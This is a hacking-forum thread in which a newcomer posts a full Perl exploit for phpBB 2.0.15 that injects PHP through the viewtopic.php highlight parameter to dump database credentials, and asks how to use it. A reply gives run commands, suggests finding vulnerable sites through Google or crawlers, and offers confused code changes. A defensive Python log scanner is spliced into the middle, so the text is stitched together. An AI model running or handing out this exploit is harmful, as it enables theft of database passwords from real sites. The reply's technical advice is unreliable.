Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  Bug y Exploits (Moderators: OzX, y0u-uNsEcUre)  |  Topic: PHPBB 2.0.15
Author  Topic: PHPBB 2.0.15  (Read 332 times)
skinnedpt
Guest
« on: October 10, 2006, 06:20:39 »

I have a phpBB 2.0.15 forum and I want to test this exploit, or another one that gives me admin access.
PhpBB 2.0.15 Database Authentication Details Exploit
Code:
#!/usr/bin/perl

# tested and working /str0ke

#        ********************************************************************
#       **********************************************************************
#      ****                                                                 **
#     ***      ******       *******************                             **
#    ***    ***   ****   ***********************                            **
#   ***   ***     ****                       ****      *   ***    *****     **
#  ***   ***      ***                ***     ***      *  **  **   **        **
# ***   ***                         ***      **         **   **  **         **
#***   ***                          ***    ***          **   **  *****      **
#**   ***                          ***  ****           **   **      **      **
#**   ***       ***  ***   ******* *******             **  ***      **      **
#**   ***      ***   ***  **      *** ***              **  **  **  **       **
#**  ***      ***   ***  **      ***  ***               ***   *****         **
#**   ***     ***   *** **       ***  ***                                   **
#**   ****   ***    ****        ***   ***                                   **
#**     *******    ****   ********     ***********************************  **
#**         ***                                                             **
#**        ***                                                              **
#**                                                                         **
#**      phpBB 2.0.15 Viewtopic.PHP Remote Code Execution Vulnerability     **
#**      This exploit gives the user all the details about the database     **
#**      connection such as database host, username, password and           **
#**      database name.                                                     **
#**                                                                         **
#**              Written by SecureD,  gvr.secured<AT>gmail<DOT>com,2005     **
#**                                                                         **
#**      Greetings to GvR, Jumento, PP, CKrew & friends              **
#**                                                                         **
#*****************************************************************************
# ***************************************************************************

use IO::Socket;

print "+-----------------------------------------------------------------------+\r\n";
print "|           PhpBB 2.0.15 Database Authentication Details Exploit        |\r\n";
print "|                 By SecureD gvr.secured<AT>gmail<DOT>com               |\r\n";
print "+-----------------------------------------------------------------------+\r\n";

if ( @ARGV < 3)
{
print "Usage:\r\n";
print "phpbbSecureD.pl SERVER DIR THREADID COOKIESTRING\r\n\r\n";
print "SERVER         - Server where PhpBB is installed.\r\n";
print "DIR            - PHPBB directory or / for no directory.\r\n";
print "THREADID       - Id of an existing thread.\r\n";
print "COOKIESTRING   - Optional, cookie string of the http request.\r\n";
print "                 Use this when a thread needs authentication for viewing\r\n";
print "                 You can use Firefox in combination with \"Live HTTP\r\n";
print "                 Headers\" to get this cookiestring.\r\n\r\n";
print "Example 1 (with cookiestring):\r\n";
print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 8 \"phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D; phpbb2mysql_sid=10dae92b780914332896df43808c4e09\" \r\n\r\n";
print "Example 2 (without cookiestring):\r\n";
print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 20 \r\n";
exit();
}

$serv = $ARGV[0];
$dir = $ARGV[1];
$threadid = $ARGV[2];
$cookie = $ARGV[3];

$serv =~ s/http:\/\///ge;
$delimit = "GvRSecureD";

$sploit = $dir . "viewtopic.php?t=";
$sploit .= $threadid;
$sploit .= "&highlight='.printf($delimit.";
$sploit .= "\$dbhost.";
$sploit .= "$delimit.";
$sploit .= "\$dbname.";
$sploit .= "$delimit.";
$sploit .= "\$dbuser.";
$sploit .= "$delimit.";
$sploit .= "\$dbpasswd.";
$sploit .= "$delimit).'";

$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80") or die "[+] Connecting ... Could not connect to host.\n\n";

print "[+] Connecting      OK\n";
sleep(1);

print "[+] Sending exploit ";
print $sock "GET $sploit HTTP/1.1\r\n";
print $sock "Host: $serv\r\n";
if ( defined $cookie) {
print $sock "Cookie: $cookie \r\n";
}
print $sock "Connection: close\r\n\r\n";


$succes = 0;

while ($answer = <$sock>) {
$delimitIndex = index $answer, $delimit;
if ($delimitIndex >= 0) {
$succes = 1;
$urlIndex = index $answer, "href";
if ($urlIndex < 0){
$answer = substr($answer, length($delimit));
$length = 0;
while (length($answer) > 0) {
$nex = index($answer, $delimit);
if ($nex > 0) {
push( @array, substr($answer, 0, $nex));
$answer = substr($answer, $nex + length($delimit), length($answer));
} else {
$answer= "";
}
}
}
}
}

close($sock);

if ($succes == 1) {
print "OK\n";
sleep(1);
print "[+] Database Host:  " . $array[0] . "\n";
sleep(1);
print "[+] Database Name:  " . $array[1] . "\n";
sleep(1);
print "[+] Username:       " . $array[2] . "\n";
sleep(1);
print "[+] Password:       " . $array[3] . "\n";
sleep(1);
} else {
print "FAILED\n";
}

# milw0rm.com [2005-07-03]

What do I need to do to use this? Thanks, and I'm new to the underground scene.
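From the defender's side, the interesting part of the script above is the request it builds: a `viewtopic.php` URL whose `highlight` parameter carries a single quote followed by `.printf(...)`, i.e. a break-out of a PHP string plus a concatenation, which is what phpBB 2.0.15 evaluated as code (the fix shipped in 2.0.16, so an upgraded board is not affected). That shape is easy to spot in web-server logs. The following is an added example, not code from this thread or from the phpBB project: a small Python scanner over Apache combined-format access-log lines that URL-decodes the `highlight` value the way the application would (repeatedly, because phpBB applied its own `urldecode()` on top of the web server's) and flags quote-plus-concatenation payloads. The log lines and IP addresses are constructed for the example; `LOG_RE`, `INJECT_RE`, `decode_highlight`, `is_suspicious_highlight` and `scan_log` are names chosen here, not phpBB identifiers.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Apache "combined" log format, matched only up to the fields we need
# (client IP, timestamp, method, request URL, status); the rest is ignored.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Fingerprint of a PHP string break-out inside the highlight value:
# a quote, then ".name(" or ".$var" (the exploit above uses '.printf($dbhost.'),
# or the closing ")." followed by a quote. Plain search words never contain this.
INJECT_RE = re.compile(r"'\s*\.\s*(?:\w+\s*\(|\$\w+)|\)\s*\.\s*'")


def decode_highlight(url):
    """Return the fully decoded 'highlight' value of a viewtopic.php request, or None."""
    parts = urlsplit(url)
    if not parts.path.endswith("viewtopic.php"):
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)  # decodes once, like the web server
    if "highlight" not in qs:
        return None
    value = qs["highlight"][0]
    # The application decoded the value again before using it, so a double-encoded
    # payload (%2527 -> %27 -> ') reached the vulnerable code as a plain quote.
    # Decode until stable (bounded) so the log shows what the application saw.
    for _ in range(3):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_suspicious_highlight(value):
    """True when a decoded highlight value looks like PHP code injection."""
    return value is not None and INJECT_RE.search(value) is not None


def scan_log(lines):
    """Return one record per access-log line carrying a suspicious highlight value."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        highlight = decode_highlight(m.group("url"))
        if is_suspicious_highlight(highlight):
            hits.append({
                "ip": m.group("ip"),
                "time": m.group("time"),
                "status": m.group("status"),
                "highlight": highlight,
            })
    return hits


# Constructed sample log: one ordinary search, one request shaped like the
# exploit above, one double-encoded variant, and one unrelated page.
SAMPLE_LOG = [
    '198.51.100.20 - - [10/Oct/2006:06:15:02 +0000] "GET /phpbb/viewtopic.php?t=8&highlight=perl+socket HTTP/1.1" 200 4102 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2006:06:20:39 +0000] "GET /phpbb/viewtopic.php?t=8&highlight=%27.printf%28%24dbhost%29.%27 HTTP/1.1" 200 5123 "-" "-"',
    '203.0.113.7 - - [10/Oct/2006:06:20:41 +0000] "GET /phpbb/viewtopic.php?t=8&highlight=%2527.printf%2528%2524dbuser%2529.%2527 HTTP/1.1" 200 5130 "-" "-"',
    '198.51.100.21 - - [10/Oct/2006:06:21:00 +0000] "GET /phpbb/index.php HTTP/1.1" 200 8000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['time']} {hit['ip']} status={hit['status']} highlight={hit['highlight']!r}")
```

Run against the constructed sample, the two requests from 203.0.113.7 are reported and the ordinary search is not; on a real server you would feed it the access log of the board and follow up any hit with a version check of the installed phpBB, since a successful request returns status 200 just like a normal topic view.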
arvin
Guest
« Reply #1 on: October 10, 2006, 06:40:57 »


Put the source, please; the kids must know the origin...


First you must know how the Perl code was made and recreate the "scene" of how the phpBB vulnerability works!


Second, if you run that exploit (in case you know all about Perl and exploit coding) under Windows you'll need a Perl interpreter, or just install Cygwin and run it from the Perl dir (place it in the Cygwin binaries):


you      @cygwin:#perl phpbbSecured.pl 192.168.168.123 /PHPBB/ 8 \"phpbb2mysql_data=<cookie_string_here>


Or maybe, if you use Linux:


you      @distro:# perl phpbbSecured.pl 192.168.168.123 /PHPBB/ 8 \"phpbb2mysql_data=<cookie_string_here>



You'll necessarily need the target to have the right phpBB version (phpBB 2.0.15). This is simple: search on Google for the "PhpBB 2.0.15" string,

or run a crawler to reveal that!


Try first to learn more about the Perl language and "exploitation techniques".

EDITED:

I see inside the exploit code that this is a classical brute force and is not an effective start; you'll see:


while ($answer = <$sock>) {
   $delimitIndex = index $answer, $delimit;
   if ($delimitIndex >= 0) {
      $succes = 1;
      $urlIndex = index $answer, "href";
      if ($urlIndex < 0){
         $answer = substr($answer, length($delimit));
         $length = 0;
         while (length($answer) > 0) {
            $nex = index($answer, $delimit);
            if ($nex > 0) {
               push(     @array, substr($answer, 0, $nex));
               $answer = substr($answer, $nex + length($delimit), length($answer));
            } else {
               $answer= "";
            }
         }
      }
   }
}



Actually those lines:

         while (length($answer) > 0) {
            $nex = index($answer, $delimit);
            if ($nex > 0) {
               push(     @array, substr($answer, 0, $nex));
               $answer = substr($answer, $nex + length($delimit), length($answer));
            } else {
               $answer= "";
            }
   


   if ($delimitIndex >= 0) {
      $succes = 1;
      $urlIndex = index $answer, "href";
      



are not effective against this phpBB. I don't know exactly, but try changing them to this:


Change those lines to:



   if ($delimitIndex >= 0) {
      $succes = 1;
      $urlIndex = index $answer, "href";


         while (length($answer) > 0) {
            $nex = index($answer, $delimit);
            if ($nex > 0) {
               push(     @array, substr($answer, 0, $nex));
               $answer = substr($answer, $nex + length($delimit), length($answer));
            } else {
               $answer= "hr";
            }
         }


So, try it and come back to discuss that....




cheers
« Last edited: October 10, 2006, 07:49:23 by AzRaEL »
Powered by SMF 1.1.7 | SMF © 2006-2007, Simple Machines LLC